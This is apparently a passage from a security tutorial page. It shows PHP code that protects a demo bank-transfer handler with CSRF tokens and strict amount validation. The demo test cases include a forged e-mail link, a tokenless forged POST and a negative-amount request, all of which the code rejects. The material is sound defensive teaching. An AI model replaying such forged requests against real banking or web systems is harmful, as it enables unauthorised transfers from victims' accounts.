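function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only for a POST request that carries the session's token. */
function csrf_ok(string $method, array $body, array $session): bool
{
    if ($method !== 'POST') {
        return false; // a clicked link is a GET and never changes state
    }
    $sent  = $body['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($known) && $known !== ''
        && hash_equals($known, $sent); // constant-time comparison
}

/** Whole EUR only: digits, greater than zero, at most the balance. */
function valid_amount($raw, int $balance): ?int
{
    if (!is_string($raw) || preg_match('/^[1-9][0-9]{0,8}\z/', $raw) !== 1) {
        return null; // rejects "-1000000", "+1.000.000", "0", "1e9", ...
    }
    $amount = (int) $raw;
    return $amount <= $balance ? $amount : null;
}

/** Hypothetical transfer handler; returns a status line for the demo. */
function handle_transfer(string $method, array $body, array &$session): string
{
    if (!csrf_ok($method, $body, $session)) {
        return 'rejected: not a POST with a valid CSRF token';
    }
    $amount = valid_amount($body['amount'] ?? null, $session['balance']);
    if ($amount === null) {
        return 'rejected: invalid amount';
    }
    $session['balance'] -= $amount;
    return "ok: transferred $amount EUR, balance {$session['balance']} EUR";
}

// Constructed demo: the starting balance matches the one shown in the post.
$session = ['balance' => 1000];
$token = csrf_token($session);

$cases = [
    'link from the e-mail (GET)'  => ['GET',  ['account' => '123-45678-90', 'amount' => '1000000']],
    'forged POST without token'   => ['POST', ['account' => '123-45678-90', 'amount' => '100']],
    'own form, negative amount'   => ['POST', ['csrf_token' => $token, 'amount' => '-1000000']],
    'own form, more than balance' => ['POST', ['csrf_token' => $token, 'amount' => '1000000']],
    'own form, 100 EUR'           => ['POST', ['csrf_token' => $token, 'amount' => '100']],
];
foreach ($cases as $label => [$method, $body]) {
    printf("%-30s %s\n", $label, handle_transfer($method, $body, $session));
}
```

Only the last case goes through and leaves 900 EUR; in a real handler the three arguments would be `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION`.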

     

    CSRF (Secret)

     

     

    Maybe Later

    [#] iNFO [#]

    All the information provided on this site is for educational purposes only.
     
    The site and its author are in no way responsible for any misuse of the information.